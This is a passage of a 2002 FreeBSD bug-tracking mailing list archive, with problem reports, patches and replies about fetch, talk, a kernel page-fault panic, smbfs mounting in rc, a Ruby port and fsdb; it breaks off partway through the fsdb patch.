00:19:28 +0200 Received: from pc5.abc (520067998749-0001@[217.233.121.54]) by fmrl01.sul.t-online.com with esmtp id 16wsL7-1IpHHsC; Mon, 15 Apr 2002 00:19:17 +0200 Received: (from nicolas@localhost) by pc5.abc (8.11.6/8.11.6) id g3EMJFC01667; Mon, 15 Apr 2002 00:19:15 +0200 (CEST) (envelope-from nicolas) Message-Id: <200204142219.g3EMJFC01667@pc5.abc> Date: Mon, 15 Apr 2002 00:19:15 +0200 (CEST) From: Nicolas Rachinsky Reply-To: Nicolas Rachinsky To: FreeBSD-gnats-submit@FreeBSD.org X-Send-Pr-Version: 3.113 Subject: bin/37079: fetch complains about "size of remote file is not known" even if -q set Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 37079 >Category: bin >Synopsis: fetch complains about "size of remote file is not known" even if -q set >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Sun Apr 14 15:20:01 PDT 2002 >Closed-Date: >Last-Modified: >Originator: Nicolas Rachinsky >Release: FreeBSD 4.5-RELEASE-p2 i386 >Organization: >Environment: System: FreeBSD pc5.abc 4.5-RELEASE-p2 FreeBSD 4.5-RELEASE-p2 #1: Fri Mar 8 22:22:24 CET 2002 nicolas@pc5.abc:/usr/obj/usr/src/sys/NR i386 >Description: when fetching a file, which size can't be determined by fetch before actually fetching the file, fetch complains "size of remote file is not known". The problem is, fetch complains even if it's told to work in "quiet mode" (-q). >How-To-Repeat: fetch -q -o /dev/null url_whose_size_can't_be_determined_before_download >Fix: --- /usr/src/usr.bin/fetch/fetch.c Tue Dec 18 10:48:09 2001 +++ fetch.c Mon Apr 15 00:12:26 2002 @@ -386,7 +386,7 @@ goto success; } - if (us.size == -1 && !o_stdout) + if (us.size == -1 && !o_stdout && v_level > 0) warnx("%s: size of remote file is not known", path); if (v_level > 1) { if (sb.st_size != -1) >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sun Apr 14 19:40:14 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 5546037B419 for ; Sun, 14 Apr 2002 19:40:01 -0700 (PDT) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g3F2e1t70059; Sun, 14 Apr 2002 19:40:01 -0700 (PDT) (envelope-from gnats) Received: from snark.rinet.ru (snark.rinet.ru [195.54.192.73]) by hub.freebsd.org (Postfix) with ESMTP id F385037B405 for ; Sun, 14 Apr 2002 19:31:43 -0700 (PDT) Received: (from glebius@localhost) by snark.rinet.ru (8.11.6/8.11.6) id g3F2VfJ04676; Mon, 15 Apr 2002 06:31:41 +0400 (MSD) (envelope-from glebius) Message-Id: <200204150231.g3F2VfJ04676@snark.rinet.ru> Date: Mon, 15 Apr 2002 06:31:41 +0400 (MSD) From: Gleb Smirnoff Reply-To: Gleb Smirnoff To: FreeBSD-gnats-submit@FreeBSD.org X-Send-Pr-Version: 3.113 Subject: bin/37083: small improvement to talk(1): add clocks Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 37083 >Category: bin >Synopsis: small improvement to talk(1): add clocks >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Sun Apr 14 19:40:01 PDT 2002 >Closed-Date: >Last-Modified: >Originator: Gleb Smirnoff >Release: FreeBSD 4.5-STABLE i386 >Organization: Rinet ISP >Environment: System: FreeBSD snark.rinet.ru 4.5-STABLE FreeBSD 4.5-STABLE #2: Wed Jan 30 12:00:01 MSK 2002 root@snark.rinet.ru:/usr/obj/usr/src/sys/SNARK i386 >Description: The following patch adds to clocks to the middle line in talk. The right one shows current time, the left one shows time spent talking. The patch was made just for fun, for a person who wastes a lot of time in talk(1). May be someone will look at it and find it useful, but I doubt :) >How-To-Repeat: >Fix: Here is the patch: diff -ur /usr/src/usr.bin/talk/display.c talk/display.c --- /usr/src/usr.bin/talk/display.c Sat Aug 28 05:06:11 1999 +++ talk/display.c Mon Apr 15 06:25:05 2002 @@ -181,3 +181,30 @@ wmove(win, oldline, oldcol); return (c); } + +void +drawline(tod) + time_t *tod; +{ + time_t uptime; + int hrs, mins, secs; + char str[COLS]; + + if (tod == NULL) { + snprintf(str,(time_t ) COLS, + "[ ]%s[ ]",line); + } else { + uptime = *tod - st_time; + uptime %= 86400; + hrs = uptime / 3600; + uptime %= 3600; + mins = uptime / 60; + secs = uptime % 60; + snprintf(str,(time_t ) COLS, + "[%02d:%02d:%02d]%s[%-8.8s]", + hrs, mins, secs, line, &(ctime(tod)[11])); + } + wmove(line_win, 0, 0); + wprintw(line_win, "%s", str); + wrefresh(line_win); +} diff -ur /usr/src/usr.bin/talk/init_disp.c talk/init_disp.c --- /usr/src/usr.bin/talk/init_disp.c Mon Jul 30 14:31:29 2001 +++ talk/init_disp.c Mon Apr 15 06:17:11 2002 @@ -52,6 +52,10 @@ #include #include "talk.h" +#define CLOCKLEN 10 + +char *line; + /* * Make sure the callee can write to the screen */ @@ -106,12 +110,10 @@ scrollok(his_win.x_win, TRUE); wclear(his_win.x_win); + line = (char *)malloc(COLS - (CLOCKLEN * 2) - 1); + memset((void *)line,'-',(COLS - (CLOCKLEN * 2) - 1)); line_win = newwin(1, COLS, my_win.x_nlines, 0); -#if defined(hline) || defined(whline) || defined(NCURSES_VERSION) - whline(line_win, 0, COLS); -#else - box(line_win, '-', '-'); -#endif + drawline(NULL); wrefresh(line_win); /* let them know we are working on it */ current_state = "No connection yet"; diff -ur /usr/src/usr.bin/talk/io.c talk/io.c --- /usr/src/usr.bin/talk/io.c Wed Oct 17 03:14:09 2001 +++ talk/io.c Mon Apr 15 06:15:27 2002 @@ -55,6 +55,8 @@ #define A_LONG_TIME 10000000 +time_t st_time; + /* * The routine to do the actual talking */ @@ -66,6 +68,7 @@ fd_set read_set, read_template; char buf[BUFSIZ], **addr, *his_machine_name; struct timeval wait; + time_t curr_time; his_machine_name = NULL; hp = gethostbyaddr((const char *)&his_machine_addr.s_addr, @@ -88,6 +91,7 @@ free(his_machine_name); message(buf); write(STDOUT_FILENO, "\007\007\007", 3); + time(&st_time); current_line = 0; @@ -103,6 +107,7 @@ wait.tv_sec = A_LONG_TIME; wait.tv_usec = 0; nb = select(32, &read_set, 0, 0, &wait); + time(&curr_time); if (nb <= 0) { if (errno == EINTR) { read_set = read_template; @@ -119,6 +124,7 @@ message("Connection closed. Exiting"); quit(); } + drawline(&curr_time); display(&his_win, buf, nb); } if (FD_ISSET(fileno(stdin), &read_set)) { @@ -129,6 +135,7 @@ int i; ioctl(0, FIONREAD, (struct sgttyb *) &nb); nb = read(0, buf, nb); + drawline(&curr_time); display(&my_win, buf, nb); /* might lose data here because sockt is non-blocking */ for (i = 0; i < nb; ++i) Only in talk/: talk.cat1 diff -ur /usr/src/usr.bin/talk/talk.h talk/talk.h --- /usr/src/usr.bin/talk/talk.h Sat Mar 9 22:23:01 1996 +++ talk/talk.h Mon Apr 15 06:03:30 2002 @@ -49,6 +49,8 @@ extern char *current_state; extern int current_line; +extern char *line; +extern time_t st_time; typedef struct xwin { WINDOW *x_win; @@ -71,6 +73,7 @@ extern void ctl_transact __P((struct in_addr,CTL_MSG,int,CTL_RESPONSE *)); extern void disp_msg __P((int)); extern void display __P((xwin_t *, char *, int)); +extern void drawline __P((time_t *)); extern void end_msgs __P((void)); extern void get_addrs __P((char *, char *)); extern int get_iface __P((struct in_addr *, struct in_addr *)); >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sun Apr 14 20:30:11 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id B8F4937B404 for ; Sun, 14 Apr 2002 20:30:00 -0700 (PDT) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g3F3U0s79377; Sun, 14 Apr 2002 20:30:00 -0700 (PDT) (envelope-from gnats) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 4ED7C37B400 for ; Sun, 14 Apr 2002 20:29:49 -0700 (PDT) Received: (from nobody@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g3F3TnZ79327; Sun, 14 Apr 2002 20:29:49 -0700 (PDT) (envelope-from nobody) Message-Id: <200204150329.g3F3TnZ79327@freefall.freebsd.org> Date: Sun, 14 Apr 2002 20:29:49 -0700 (PDT) From: Alexandr To: freebsd-gnats-submit@FreeBSD.org X-Send-Pr-Version: www-1.0 Subject: i386/37086: kernel trap 12 Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 37086 >Category: i386 >Synopsis: kernel trap 12 >Confidential: no >Severity: critical >Priority: high >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Sun Apr 14 20:30:00 PDT 2002 >Closed-Date: >Last-Modified: >Originator: Alexandr >Release: FreeBSD 4.5-RELEASE #4: Sat Apr 13 20:09:44 VLAST 2002 >Organization: KhSTU >Environment: FreeBSD service.khstu.ru 4.5-RELEASE FreeBSD 4.5-RELEASE #4: Sat Apr 13 20:09:44 VLAST 2002 regressor@service.khstu.ru:/usr/src/sys/compile/SERVICE i386 >Description: fatal trap 12: page fault while in kernel mode mp_lock = 00000002 ; cpuid = 0 ; lapic.id = 03000000 fault virtual addr = 0xc12bd000 fault code = supervisor read, page not present instruction pointer = 0x8 : c0272502 stack pointer = 0x10 : 0xd6ffcc30 frame pointer = 0x10 : 0xd6ffcc58 code segment = base 0x0, limit 0xfffff, type 0x1b = DPL 0, pres 1, def32 1, gran 1 processor eflags = interrupt enabled, resume, IOPL = 0 current process = (316) iserverd interrupt mask = net <- SMP : XXX kernel: type 12 trap, code 0 Stopped at generic_body + 0x1a : repe movsl (%esi), %es:(%edi) ---------------------------------------------------------------- >How-To-Repeat: I dont know.... This problem appears on heavy load... >Fix: :( >Release-Note: >Audit-Trail: >Unformatted: >trace generic_copy(c12bcf00, c2b447e2, 3c, c2447b0, c2b3c50) at generic_copy+0x1a catchpacket(c2b3c500, c12bcf00, 3c, 5ea, c019bac8) at catchpacket+0x15e bpf_mtap(c285aa00, c12bcf00) at bpf_mtap+0x58 wx_start(c285aa00, c12bcf00, c2bfadd0, c2c46500, c12bcf00) at wx_start+0x392 ip_output(c12bcf00, 0, d54cdbfc, 0, 0) at ip_output+0xbc4 udp_output(d54cdbc0, C12bcf00, c2c21f10, 0d49dba40) at udp_output+24a udp_send(d540bf80, 0, c12bcf00, c2c21f10, 0) at udp_send+0x10 sosend(d540bf80, 0, c12bcf00, c2c21f10, 0) at sosend+0x5df sendit(d49dba40, 1, d6fbcf08, 0, 8089d04) at sendit+0x253 sendto(d49dba40, d6fbcf80, 80888c0, bfbfe44c, 8089cd4) at sendto+0x4e syscall2(2f,2f,2f, 8089cd4, bfbfe44c) at syscall2+0x221 Xint0x80_SYScall() at Xint0x80_SYScall+0x26 ----------------------------------------------------------------- System: i386, Intel SR1200 server, netcard: intel pro1000T, dual PIII-1000. ------------------------------------------------------------------ System running: inn, squid, iserverd, postgresql, apache and snort (Intrusion Detection System that use bpf) securelevel=3, ipfw contain 108 rules ------------------------------------------------------------------ Kernel config (cuts): makeoptions DEBUG=-g machine i386 cpu I686_CPU ident SERVICE maxusers 128 options SMP options APIC_IO options NBUF=4096 options NMBCLUSTERS=8192 options PANIC_REBOOT_WAIT_TIME=240 options DDB pseudo-device loop pseudo-device ether pseudo-device tun pseudo-device pty pseudo-device md pseudo-device bpf options IPFIREWALL options IPFIREWALL_VERBOSE options IPFIREWALL_FORWARD options IPFIREWALL_VERBOSE_LIMIT=1000 options IPDIVERT options IPFILTER options IPFILTER_LOG options IPFIREWALL_DEFAULT_TO_ACCEPT options IPSTEALTH options RANDOM_IP_ID options ICMP_BANDLIM options DUMMYNET device miibus device fxp device wx To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sun Apr 14 23:14:17 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 3699C37B400; Sun, 14 Apr 2002 23:14:16 -0700 (PDT) Received: (from cjc@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g3F6EG710935; Sun, 14 Apr 2002 23:14:16 -0700 (PDT) (envelope-from cjc) Date: Sun, 14 Apr 2002 23:14:16 -0700 (PDT) From: Message-Id: <200204150614.g3F6EG710935@freefall.freebsd.org> To: cjc@FreeBSD.org, freebsd-bugs@FreeBSD.org, des@FreeBSD.org Subject: Re: bin/37079: fetch complains about "size of remote file is not known" even if -q set Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: fetch complains about "size of remote file is not known" even if -q set Responsible-Changed-From-To: freebsd-bugs->des Responsible-Changed-By: cjc Responsible-Changed-When: Sun Apr 14 23:14:01 PDT 2002 Responsible-Changed-Why: To the fetch(1) maintainer. http://www.freebsd.org/cgi/query-pr.cgi?pr=37079 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Apr 15 2: 0:30 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 63E4037B41A for ; Mon, 15 Apr 2002 02:00:05 -0700 (PDT) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g3F905452027; Mon, 15 Apr 2002 02:00:05 -0700 (PDT) (envelope-from gnats) Received: from insomnia.powertech.no (insomnia.powertech.no [195.159.0.182]) by hub.freebsd.org (Postfix) with ESMTP id BE96A37B41C for ; Mon, 15 Apr 2002 01:59:45 -0700 (PDT) Received: (from frode@localhost) by insomnia.powertech.no (8.11.6/8.11.0) id g3F8xis30291; Mon, 15 Apr 2002 10:59:44 +0200 Message-Id: <200204150859.g3F8xis30291@insomnia.powertech.no> Date: Mon, 15 Apr 2002 10:59:44 +0200 From: Frode Nordahl Reply-To: Frode Nordahl To: FreeBSD-gnats-submit@FreeBSD.org Cc: Frode Nordahl X-Send-Pr-Version: 3.113 Subject: conf/37091: rc script fails if there are smbfs filesystems in /etc/fstab Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 37091 >Category: conf >Synopsis: rc script fails if there are smbfs filesystems in /etc/fstab >Confidential: no >Severity: non-critical >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Mon Apr 15 02:00:05 PDT 2002 >Closed-Date: >Last-Modified: >Originator: Frode Nordahl >Release: FreeBSD 4.5-STABLE i386 >Organization: >Environment: System: FreeBSD ws24.ns5.powertech.no 4.5-STABLE FreeBSD 4.5-STABLE #0: Mon Mar 25 09:40:01 CET 2002 root@ws24.ns5.powertech.no:/usr/obj/usr/src/sys/GENERIC i386 >Description: SMBFS has been included in the base system, and should also be supported by the startup scripts. If you include a smbfs file system in /etc/fstab without the "noauto" option, the rc script tries to mount before the network is up. I have included a patch to treat smbfs the same way as NFS file systems, delay mount time until network is up. >How-To-Repeat: Add a smbfs mountpoint to your /etc/fstab, reboot. >Fix: --- rc_smbfs.patch begins here --- --- /usr/src/etc/rc Mon Apr 15 06:00:45 2002 +++ /etc/rc Mon Apr 15 10:33:34 2002 @@ -212,8 +212,8 @@ if [ -n "${diskless_mount}" -a -r "${diskless_mount}" ]; then sh ${diskless_mount} else -# otherwise mount everything except nfs filesystems. - mount -a -t nonfs +# otherwise mount everything except nfs and smb filesystems. + mount -a -t nonfs,nosmbfs fi case $? in @@ -326,6 +326,16 @@ *mount_nfs*) echo -n 'Mounting NFS file systems:' mount -a -t nfs + echo '.' + ;; +esac + +# Mount SMB filesystems if present in /etc/fstab +# +case "`mount -d -a -t smbfs 2> /dev/null`" in +*mount_smbfs*) + echo -n 'Mounting SMB file systems:' + mount -a -t smbfs echo '.' ;; esac --- rc_smbfs.patch ends here --- >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Apr 15 2:17:49 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 04DFC37B404; Mon, 15 Apr 2002 02:17:47 -0700 (PDT) Received: (from roam@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g3F9HkP58952; Mon, 15 Apr 2002 02:17:46 -0700 (PDT) (envelope-from roam) Date: Mon, 15 Apr 2002 02:17:46 -0700 (PDT) From: Message-Id: <200204150917.g3F9HkP58952@freefall.freebsd.org> To: frode@nordahl.net, roam@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: conf/37091: rc script fails if there are smbfs filesystems in /etc/fstab Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: rc script fails if there are smbfs filesystems in /etc/fstab State-Changed-From-To: open->closed State-Changed-By: roam State-Changed-When: Mon Apr 15 02:15:53 PDT 2002 State-Changed-Why: This is basically a duplicate of PR conf/34729; even the included patch is the same :) Can you try Sheldon Hearn's suggestions in the audit trail of conf/34729, and then send a follow-up to that by sending a message with a subject line of 'Re: conf/34729' to bug-followup@FreeBSD.org? http://www.freebsd.org/cgi/query-pr.cgi?pr=37091 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Apr 15 2:59:14 2002 Delivered-To: freebsd-bugs@freebsd.org Received: from cerebellum.za.net (cerebellum.za.net [196.34.172.103]) by hub.freebsd.org (Postfix) with ESMTP id 16AE537B404 for ; Mon, 15 Apr 2002 02:59:02 -0700 (PDT) Received: from bertoffice (rdg-dial-196-2-33-214.mweb.co.za [196.2.33.214]) by cerebellum.za.net (8.11.6/8.11.3) with ESMTP id g3FA3qS33264 for ; Mon, 15 Apr 2002 10:03:53 GMT (envelope-from ian@cerebellum.za.net) From: "Ian Barnes" To: Subject: Ruby problem Date: Mon, 15 Apr 2002 12:00:29 +0200 Message-ID: <000401c1e464$64622260$8400000a@comrite.co.za> MIME-Version: 1.0 Content-Type: text/plain; charset="Windows-1252" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook, Build 10.0.3416 Importance: Normal X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I was trying to install ruby from the ports collection... this is the output [root@cerebellum /usr/ports/lang/ruby] # make install >> ruby-1.6.7.tar.gz is not in /usr/ports/lang/ruby/distinfo. >> Either /usr/ports/lang/ruby/distinfo is out of date, or >> ruby-1.6.7.tar.gz is spelled incorrectly. *** Error code 1 Stop in /usr/ports/lang/ruby. [root@cerebellum /usr/ports/lang/ruby] # I hope this is a bug, otherwise sorry for posting to the wrong list... Please advise on how to fix TIA Ian To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Apr 15 3:50:12 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 5E3DA37B400 for ; Mon, 15 Apr 2002 03:50:03 -0700 (PDT) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g3FAo3l76844; Mon, 15 Apr 2002 03:50:03 -0700 (PDT) (envelope-from gnats) Date: Mon, 15 Apr 2002 03:50:03 -0700 (PDT) Message-Id: <200204151050.g3FAo3l76844@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Peter Pentchev Subject: Re: bin/37036: Make "periodic" output show positive "end-of-report" info Reply-To: Peter Pentchev Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR bin/37036; it has been noted by GNATS. From: Peter Pentchev To: David Wolfskill Cc: FreeBSD-gnats-submit@FreeBSD.org Subject: Re: bin/37036: Make "periodic" output show positive "end-of-report" info Date: Mon, 15 Apr 2002 13:42:28 +0300 On Sat, Apr 13, 2002 at 04:54:13AM -0700, David Wolfskill wrote: > > >Number: 37036 > >Category: bin > >Synopsis: Make "periodic" output show positive "end-of-report" info > >Originator: David Wolfskill > >Description: > The output from "periodic" is a collection of outputs from a > variety of individual scripts. As such, if the output were > to be truncated for some reason, the recipient of the report > could well fail to notice this. While this could well be > considered the responsibility of the recipient, there is a > small thing we could do to make the recipient's life a little > easier: just add a line to indicate that "this is the end." FWIW, I like both the idea and the patch very much! G'luck, Peter -- Peter Pentchev roam@ringlet.net roam@FreeBSD.org PGP key: http://people.FreeBSD.org/~roam/roam.key.asc Key fingerprint FDBA FD79 C26F 3C51 C95E DF9E ED18 B68D 1619 4553 Thit sentence is not self-referential because "thit" is not a word. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Apr 15 3:50:16 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 179FC37B405 for ; Mon, 15 Apr 2002 03:50:05 -0700 (PDT) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g3FAo5s76850; Mon, 15 Apr 2002 03:50:05 -0700 (PDT) (envelope-from gnats) Date: Mon, 15 Apr 2002 03:50:05 -0700 (PDT) Message-Id: <200204151050.g3FAo5s76850@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Shutko Subject: Re: i386/37086: kernel trap 12 Reply-To: Shutko Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR i386/37086; it has been noted by GNATS. From: Shutko To: freebsd-gnats-submit@FreeBSD.org, AVShutko@mail.khstu.ru Cc: Subject: Re: i386/37086: kernel trap 12 Date: Mon, 15 Apr 2002 15:30:47 +1100 Also I forgot to write about sysclt variables.... Here are content of my /etc/sysctl.conf file: net.inet.tcp.delayed_ack=0 net.local.stream.recvspace=65535 net.local.stream.sendspace=32768 net.inet.tcp.sendspace=32768 net.inet.tcp.recvspace=65535 net.inet.tcp.always_keepalive=1 vfs.vmiodirenable=1 kern.maxfiles=65536 kern.ipc.somaxconn=4096 kern.ipc.shm_use_phys=1 net.inet.icmp.drop_redirect=0 net.inet.icmp.log_redirect=0 net.inet.ip.redirect=0 net.inet.icmp.icmplim=400 net.inet.ip.sourceroute=0 net.inet.ip.accept_sourceroute=0 net.link.ether.inet.max_age=1200 net.inet.icmp.bmcastecho=0 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Apr 15 4:40: 8 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id D19EB37B41A for ; Mon, 15 Apr 2002 04:40:02 -0700 (PDT) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g3FBe2D96624; Mon, 15 Apr 2002 04:40:02 -0700 (PDT) (envelope-from gnats) Date: Mon, 15 Apr 2002 04:40:02 -0700 (PDT) Message-Id: <200204151140.g3FBe2D96624@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: David Wolfskill Subject: Re: bin/37036: Make "periodic" output show positive "end-of-report" info Reply-To: David Wolfskill Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR bin/37036; it has been noted by GNATS. From: David Wolfskill To: david@catwhisker.org, roam@ringlet.net Cc: FreeBSD-gnats-submit@FreeBSD.org Subject: Re: bin/37036: Make "periodic" output show positive "end-of-report" info Date: Mon, 15 Apr 2002 04:39:44 -0700 (PDT) >Date: Mon, 15 Apr 2002 13:42:28 +0300 >From: Peter Pentchev >FWIW, I like both the idea and the patch very much! Thanks for the feedback! :-) It had just been one of those "nagging things in the background" that bugged me; I finally spent a few minutes to see if I could make the situation better. The implementation could certainly be made more elaborate (complicated), but I think that going beyond what I did would get beyond the "point of diminishing returns" very quickly. Cheers, david (links to my resume at http://www.catwhisker.org/~david) -- David H. Wolfskill david@catwhisker.org Based on my experience as a computing professional, I consider the use of Microsoft products as components of computing systems to be just as advisable as using green wood to frame a house... and expect similar results. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Apr 15 5:30:22 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 5FD4D37B419 for ; Mon, 15 Apr 2002 05:30:01 -0700 (PDT) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g3FCU1K13364; Mon, 15 Apr 2002 05:30:01 -0700 (PDT) (envelope-from gnats) Received: from green.shallow.net (c16486.smelb1.vic.optusnet.com.au [210.49.224.105]) by hub.freebsd.org (Postfix) with ESMTP id 7379037B400 for ; Mon, 15 Apr 2002 05:26:43 -0700 (PDT) Received: by green.shallow.net (Postfix, from userid 1001) id 7BE253E2A; Mon, 15 Apr 2002 22:26:40 +1000 (EST) Message-Id: <20020415122640.7BE253E2A@green.shallow.net> Date: Mon, 15 Apr 2002 22:26:40 +1000 (EST) From: Joshua Goodall Reply-To: Joshua Goodall To: FreeBSD-gnats-submit@FreeBSD.org X-Send-Pr-Version: 3.113 Subject: bin/37096: Fixes to fsdb command-line handling [patch] Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 37096 >Category: bin >Synopsis: Fixes to fsdb command-line handling [patch] >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Mon Apr 15 05:30:01 PDT 2002 >Closed-Date: >Last-Modified: >Originator: Joshua Goodall >Release: FreeBSD 5.0-CURRENT i386 >Organization: >Environment: System: FreeBSD gold.shallow.net 5.0-CURRENT FreeBSD 5.0-CURRENT #1: Mon Apr 15 17:55:08 EST 2002 joshua@green.shallow.net:/usr/obj/usr/current/sys/GENERIC i386 >Description: fsdb(8) tries to handle the case where the last argument to a command is slurped in whitespace-n-all. Unfortunately, it's applied across the board, with hilarious results : fsdb (inum: 2)> ls foo Segmentation fault (core dumped) # This patch fixes that by setting a new flag FL_ST for commands as appropriate. Plus, for some reason, fsdb sometimes reports argc's, sometimes argc-1 in usage lines. argc is an implementation detail which != count of arguments; this patch trivially fixes the cases seen. Tested with today's -current. >How-To-Repeat: >Fix: Index: sbin/fsdb/fsdb.c =================================================================== RCS file: /cvs/src/sbin/fsdb/fsdb.c,v retrieving revision 1.24 diff -u -r1.24 fsdb.c --- sbin/fsdb/fsdb.c 21 Mar 2002 13:10:52 -0000 1.24 +++ sbin/fsdb/fsdb.c 15 Apr 2002 12:06:43 -0000 @@ -150,8 +150,8 @@ { "?", "Print out help", 1, 1, FL_RO, helpfn }, { "inode", "Set active inode to INUM", 2, 2, FL_RO, focus }, { "clri", "Clear inode INUM", 2, 2, FL_WR, zapi }, - { "lookup", "Set active inode by looking up NAME", 2, 2, FL_RO, focusname }, - { "cd", "Set active inode by looking up NAME", 2, 2, FL_RO, focusname }, + { "lookup", "Set active inode by looking up NAME", 2, 2, FL_RO | FL_ST, focusname }, + { "cd", "Set active inode by looking up NAME", 2, 2, FL_RO | FL_ST, focusname }, { "back", "Go to previous active inode", 